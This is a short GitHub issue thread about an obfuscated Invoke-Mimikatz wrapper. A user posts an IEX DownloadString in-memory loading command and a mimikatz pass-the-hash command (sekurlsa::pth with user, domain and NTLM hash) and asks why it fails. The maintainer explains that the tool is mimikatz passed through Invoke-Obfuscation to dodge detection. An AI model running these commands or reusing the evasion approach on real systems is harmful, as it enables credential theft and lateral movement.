Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PTH arguments #1

Open
XemBryan opened this issue Sep 30, 2019 · 1 comment
Open

PTH arguments #1

XemBryan opened this issue Sep 30, 2019 · 1 comment

Comments

@XemBryan
Copy link

I'm loading to memory:

IEX (New-Object Net.WebClient).DownloadString('C:\Users\aki\Desktop\new\Invoke-Cats.ps1')
and then executing Invoke-Catspass the hash with command:

PS C:\Users\Administrator> Invoke-Cats-Command 'sekurlsa::pth /user:Administrator /domain:CISCO /NTLM:someNTLM'
returns an error:

ERROR kuhl_m_sekurlsa_pth ; Missing argument : user
But the argument is there. It happens on W2012

So the question is: how to write Cats command in Powershell to not complaint about arguments?

@DanMcInerney
Copy link
Owner

Hmm not sure. This script requires regularly rerunning mimikatz through invoke-obfuscation and I haven't done it in a while. But basically all this script is is Invoke-Mimikatz run through Invoke-Obfuscation with function names changed. It takes several tries to get working output and requires a lot of testing that I don't really want to do right now.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants